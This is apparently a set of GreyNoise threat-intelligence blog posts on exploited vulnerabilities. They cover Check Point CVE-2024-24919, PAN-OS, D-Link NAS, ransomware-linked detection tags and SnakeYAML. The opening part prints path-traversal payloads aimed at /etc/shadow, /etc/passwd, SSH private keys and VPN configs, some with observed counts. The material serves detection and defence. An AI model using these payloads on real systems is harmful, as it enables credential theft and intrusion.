User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:82.0) Gecko/20100101 Firefox/82.0
Connection: close
Content-Length: 39
Accept-Encoding: gzip

aCSHELL/../../../../../../../etc/shadow

Around that same time, a chorus of different scanners emerged that used a bunch of different paths. Due to the nature of the vulnerability, it’s very hard to determine the actual intent of the attacker - all we know is which file they’re trying to fetch. Whether they’re using that to steal passwords or to test the vulnerability is hard to know.

That being said, as of June 4, 2024, here is the top-10 list of plausibly-working payloads that we’ve observed, with the counts:

4805 ../../../../../../../etc/fstab
2453 ../../../../../../../etc/shadow
980 ../../../../../../../sysimg/CPwrapper/SU/Products.conf
959 ../../../../../../../config/db/initial
508 ../../../../../../../etc/passwd
202 ../../../../../../../home/*/.ssh/authorized_keys
166 ../../../../../../../opt/checkpoint/conf/
165 ../../../../../../../etc/ssh/sshd_config
163 ../../../../../../../etc/vpn/vpn.conf
161 ../../../../../../../home/*/.ssh/id_rsa

It’s interesting to contrast that with this list, which we generated yesterday (June 3, 2024):

1615 ../../../../../../../etc/fstab
491 ../../../../../../../etc/passwd
486 ../../../../../../../etc/shadow
197 ../../../../../../../home/*/.ssh/authorized_keys
161 ../../../../../../../opt/checkpoint/conf/
160 ../../../../../../../etc/ssh/sshd_config
158 ../../../../../../../etc/vpn/vpn.conf
156 ../../../../../../../home/*/.ssh/id_rsa
94 ../../../../../../../home/*/.ssh/known_hosts
83 ../../../../../../../home/root/.ssh/authorized_keys

As you can see, /etc/fstab remains a popular target - probably it’s a reliable path being used by some off-the-shelf scanner(s).

/etc/shadow of course remains popular, but we’re suddenly seeing a lot of attempts to pull

/sysimg/CPwrapper/SU/Products.conf and /config/db/initial that we weren’t seeing yesterday. That demonstrates how the attack is evolving day over day!

Unfortunately, we didn’t directly observe the 0-day exploitation prior to the advisory being released; presumably, the attacks were targeted and didn’t hit our sensor network (although as we expand our new sensors and personas to real networks, we expect to start seeing this type of 0-day exploitation in Sift!)

Conclusion

With a public proof of concept out, and exploitation quickly ramping up, we recommend patching Check Point as soon as possible!

References

• CVE-2024-24919
• Check Point advisory
• Censys blog
• watchTowr write-up
• Mnemonic blog
• Proof of concept
• CISA alert

‍

Yesterday, GreyNoise reached a fun and significant milestone after publishing our 1,337th tag. 1337 is a cherished number in hacker culture, as it is a numerical shorthand for "leet", which itself stands for "elite". This term has deep roots, going all the way back to the 80's when one had to make modems scream to access bulletin board systems (now, we humans are the ones screaming whenever we go online to see what fresh hades awaits us each day).

What makes this milestone even more significant is how it was achieved.

The chart, below, shows the cumulative sum of tag counts by year. While there was a modest improvement in intra-year tag creation from 2022 to 2023, we're just into the first few weeks of Q2 in 2024 and are almost at the total tag count for 2023.

We will almost certainly blow past 2023's tag count well-before the end of Q2, and this has all been made possible by our focused and practical use of AI. This system helps our incredible detection engineers quickly triage the millions of events our sensor fleet absorbs every day. With it, they discover and tag novel payloads to help inform and protect our customers, community, and the internet as a whole. The application that fuels this work is called Sift, and we've waxed poetic about it quite a bit over the past few months.

This boost to the tag inventory has also meant an increase in CVE coverage.

(Since it most likely drew your attention, the jumps in 2022 were due numerous factors, including the increase in Russian hostilities towards Ukraine.)

60% of 2024 tags are based on CVEs, and — along with plenty of "modern" vulnerabilities — Sift has helped us catch exploitation attempts of some very old CVEs, too:

I'm incredibly proud of our team of data scientists, security researchers, and detection engineers. Their leet expertise powers the detections that folks rely on every day, and we hope you'll join in our celebration of achieving this epic milestone!

To learn more about GreyNoise tags and how they differ from "traditional" detections, check out our Tags Webinar Series.

‍

On April 12th, 2024, Palo Alto Networks announced CVE-2024-3400. CVE-2024-3400 is a CVSS 10 critical arbitrary file-write vulnerability in Palo Alto Networks PAN-OS software versions 10.2, 11.0, and 11.1.  This vulnerability enables unauthenticated attackers to execute arbitrary Linux commands with root-level privileges on affected firewalls if firewalls are configured with a GlobalProtect gateway or portal (or both) and device telemetry enabled.

‍

Palo Alto and Unit 42 have confirmed that threat actors have exploited CVE-2024-3400 in a limited number of attacks in the wild. CISA published guidance and added it to the Known Exploited Vulnerability (KEV) on Friday, April 12, 2024.

Palo Alto Networks released workaround guidance and some hotfixes on April 14, 2024. Customers can also mitigate the vulnerability by enabling Threat ID 95187 if they have a Threat Prevention subscription, or by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version.

GreyNoise is tracking opportunistic exploitation attempts here.  As of April 15, 2024, 17:00 UTC, no attempts have been observed by our fleet. 

Of note: our sensor fleet has detected instances of nonworking exploits that have been circulated online, claiming to be for CVE-2024-3400. This indicates that opportunistic exploitation will quickly follow once a successful exploit code is released.

‍

‍

A remote code execution vulnerability in D-Link NAS devices is actively being exploited and is tracked under CVE-2024-3273. The vulnerability is believed to affect as many as 92,000 devices and further information can be found on D-Link’s support announcement.

(04/11/2024): Clarification on CVE-2024-3273 & CVE-2024-3272

Exploitation of the CVE-2024-3273 command injection vulnerability requires the two valid `user=` and `passwd=` parameters. There is a companion vulnerability tracked as CVE-2024-3272 and describes the issue as "manipulation of the argument user with the input messagebus leads to hard-coded credentials". It is important to note that the "credentials" as described are only the username for the user "messagebus".

"messagebus" is not a backdoor account. It is one of many common pre-configured linux system users that functionally cannot "log in", and thus have no password. Other common example system users include avahi, syslog, nobody, ntp, rtkit, and whoopsie. D-Link correctly validates that the username exists and also correctly validates that the provided password is correct. The logic flaw exercised by CVE-2024-3273 is that the empty (correct) password for the "messagebus" user is never validated that the user should ever be able to log in using a password, if at all.

(04/09/2024): Update on number of vulnerable devices

Upon further analysis, it appears the number of vulnerable devices is much lower than initially reported.  According to our friends at Censys, the number is closer to 5,500 devices.

‍

GreyNoise quickly released a tag for tracking under D-Link NAS CVE-2024-3273 RCE Attempt, which was relatively easy for us because our Sift tooling surfaced the exploit to us automatically. Sift curates a report of new/interesting traffic observed by GreyNoise sensors daily after doing much of the analysis and triage work itself.

You can read more about Sift.

‍

‍

Sift’s analysis above is correct! Taking it a step further, the command the above IP is attempting to execute is a generic shell script pattern used by botnet operators to try to execute malware for every possible CPU architecture in the expectation that at least one will work. The malware is fetched from 38[.]6[.]224[.]248 over HTTP.

We have retrieved the sample skid.x86 and uploaded it to VirusTotal for sharing and further analysis:

• https://www.virustotal.com/gui/file/859e679f8e8be4a4c895139fb7fb1b177627bbe712e1ed4c316ec85008426db8

‍

Ever wonder what happens to vulnerabilities after they're forgotten? 

In a new blog from the GreyNoise Labs team, we look at CVE-2023-22527, an Atlassian Confluence vulnerability that was all over the news back in January/2024, then forgotten a week later. But even though the media has forgotten, attackers haven't!

The Labs team digs a little into who the attacker is and their techniques - killing other malware, deleting log files, and even using SSH keys to infect other hosts.

If you're interested in how attackers use old vulnerabilities and what they do once they're on a host, check it out! 

‍

‍

‍

In October 2023 — as part of the Ransomware Vulnerability Warning Pilot (RVWP) — CISA began tagging entries in their Known Exploited Vulnerabilities (KEV) catalog. This field designates whether exploits for a given vulnerability are known to be used in ransomware attacks. Ransomware has disrupted critical services, businesses, and communities worldwide, and many organizations are working diligently to get ahead of these attacks to prevent losses, disruptions, and exposures.

We’ve talked about this topic before, but today we dig a bit deeper into the topic with some specific guidance as to how your organization can fight the good fight against these foes by leveraging the power of GreyNoise tags.

GreyNoise Tags vs. Ransomware

As scores of organizations who use them know, GreyNoise tags are a signature-based detection method that categorizes internet noise into actionable intelligence. As of this writing, we’ve observed recent activity in 63 tags that CISA has identified as being used in association with ransomware attacks. The figure at the beginning of this post shows the frequency and volume of this opportunistic activity. One striking feature of this activity is the diversity of targeted platforms.

In the case of internet-facing attack campaigns, one might assume that vulnerabilities targeted by ransomware actors would lean towards remote access technologies. The chart and our data that backs it up shows that almost no technology category is safe from these types of attacks. Collaboration tools, such as Atlassian Confluence or JetBrains TeamCity; email platforms, such as Microsoft Exchange; software that powers application middleware services, such as Jboss and WebLogic; or, even devices that are intended to help elevate safety and resilience, such as SonicWall, Ivanti, Citrix, and Fortinet are all regularly targeted.

If you use any of these technologies, knowing when new activity is seen can be helpful in shoring up defenses and readying response activities. By leveraging GreyNoise platform features, such as our Alerts and block lists, security teams can, respectively, determine if more focus should be placed on monitoring key systems and preventing opportunistic harm. With the noise weeded out, response teams can focus their attention on similar activity that is likely to be more targeted, which may also mean by more capable adversaries. And, because we play incredibly well with a host of other security tools, teams can also save time, and use our intelligence within familiar environments.

The Long, Sporadic Tail Of Ransomware Tag Activity

Another striking feature of our ransomware tag activity chart is the diversity of activity. Cloud deployments top the list, with attackers looking to take advantage of misconfigurations that may arise in these highly dynamic environments. Broad and commonly deployed technologies are also regular targets, since these systems can also become victims of errant misconfigurations, especially when restored from unpatched backups.

However, as we move down the list, the frequency becomes far more sporadic, and many involve only single hosts vs. botnet armies. This can be due to attacker familiarity, or individual actors keying off results from well-timed Censys or Shodan searches that show newly exposed vulnerable configurations. If your organization uses any of these components, there truly is no rest from vigilance.

The Ransomware GNQL Listicle

To help defenders get a leg up on these attacks, the list below has links to each individual tag that’s known to be used in ransomware attacks. At each tag page, you can find the block list URL which you can use to immediately weed out the opportunistic noise. Wrap one or more of them inside a GNQL query, such as tags:"F5 BIG-IP iControl RCE Attempt", and you can set up an alert to notify you when new activity is seen, especially in generally dormant tags.

• Adobe ColdFusion LFI Attempt
• Adobe XML External Entity Injection Attempt
• Apache ActiveMQ RCE Attempt
• Apache HTTP Server Path Traversal Attempt
• Apache Log4j RCE Attempt
• Apache Struts CVE-2017-5638 Worm
• Atlassian Confluence Server Authentication Bypass Attempt
• Atlassian Confluence Server CVE-2022-26134 OGNL Injection Attempt
• Atlassian Confluence Server OGNL Injection Attempt
• Atlassian Confluence Server Privilege Escalation Attempt
• Atlassian Confluence Template Injection Attempt
• Azure OMI RCE Attempt
• Azure OMI RCE Check
• Citrix ADC Netscaler CVE-2023-4966 Information Disclosure Attempt
• Citrix ADC Netscaler CVE-2023-4966 Information Disclosure Check
• Citrix NetScaler LFI
• DotCMS File Upload Attempt
• DotNetNuke Remote Code Execution Attempt
• Drupal CVE-2018-7600 Worm
• Exchange ProxyNotShell Vuln Check
• Exchange ProxyShell Vuln Attempt
• Exchange ProxyShell Vuln Check
• F5 BIG-IP TMUI RCE Vuln Check
• F5 BIG-IP iControl CVE-2021-22986 RCE Attempt
• F5 BIG-IP iControl RCE Attempt
• ForgeRock OpenAM Pre-Auth RCE Vuln Check
• FortiOS Authentication Bypass Attempt
• FortiOS Info Disclosure CVE-2018-13379
• GPON CVE-2018-10561 Router Worm
• IBM Aspera Faspex RCE Attempt
• Ivanti EPMM (MobileIron Core) Authentication Bypass Attempt
• Jboss Application Server CVE-2017-12149 Check
• JetBrains TeamCity Authentication Bypass Attempt
• MOVEit CVE-2023-34362 Attempt
• MOVEit Transfer Scanner
• Oracle WebLogic CVE-2017-10271 Worm
• Oracle Weblogic CVE-2019-2725 Crawler
• Oracle Weblogic CVE-2019-2725 Worm
• PaperCut Authentication Bypass Check
• PaperCut RCE Attempt
• ProxyLogon SSRF Vuln Check
• Pulse Secure VPN File Disclosure
• QNAP CVE-2022-27593 Attempt
• QNAP QTS and Photo Station LFI Attempt
• QNAP walter SSH Backdoor Attempt
• SMBGhost Vuln Checker
• Sitecore RCE Attempt
• SonicWALL SRA SQL Injection Attempt
• SonicWALL SRA SQL Injection Vuln Check
• SonicWall SRA 4600 SQL Injection Attempt
• Spring Data Commons RCE CVE-2018-1273
• TerraMaster NAS api.php RCE Check
• Tomcat Backdoor Upload Attempt CVE-2017-12615
• Tomcat Backdoor Use Attempt CVE-2017-12615
• VMWare VCSA File Upload Check
• VMWare vRealize Operations SSRF
• VMware Workspace ONE RCE Attempt
• VMware vCenter RCE Attempt
• VMware vCenter RCE Vuln Check
• VMware vSphere Client RCE Attempt
• WSO2 API Manager File Upload Attempt
• Zoho ManageEngine RCE Attempt
• Zoho ManageEngine RCE CVE-2022-47966 Attempt

Find Out More

If you're curious as to just how GreyNoise researchers craft our tags we have a three-part webinar series that discusses the makeup of our tags, walks you through how we discover what needs to be tagged, and illustrates how AI is empowering the creation of new tags and detections:

• Webinar Series - Session 1/3 - Tags 101: GreyNoise Detection Engineering: Introduction To "Tags"
• Webinar Series - Session 2/3 - GreyNoise Detection Engineering: Under The Hood
• Webinar Series - Session 3/3 - Tags 301: GreyNoise Detection Engineering AI: Leave No Interaction Untagged

Not a GreyNoise customer — yet? See how much time GreyNoise may be able to save your organization, and how many hours your defenders can save with our ROI calculator.

‍Sign up and take our platform for a free enterprise trial to see all the features and data available.

SnakeYAML has slithered its way into a deserialization vulnerability, with versions before 2.0 allowing remote code execution when used to parse untrusted input. In this GreyNoise Labs post, Lead Security Researcher Ron Bowes digs into the technical details, drama, and exploits around CVE-2022-1471.  

‍

By default, SnakeYAML allows the instantiation of arbitrary Java classes from untrusted YAML sources. This "insecure by default" design has led to at least eight different vulnerabilities prior to its official designation as a CVE. We'll highlight the unhelpful responses from developers and the importance of secure defaults.

Additionally, we'll demonstrate how to build a vulnerable app and understand how the deserialization actually works, developing an exploit to demonstrate how to achieve remote code execution.

C'mon down for an in-depth look at this critical YAML vulnerability!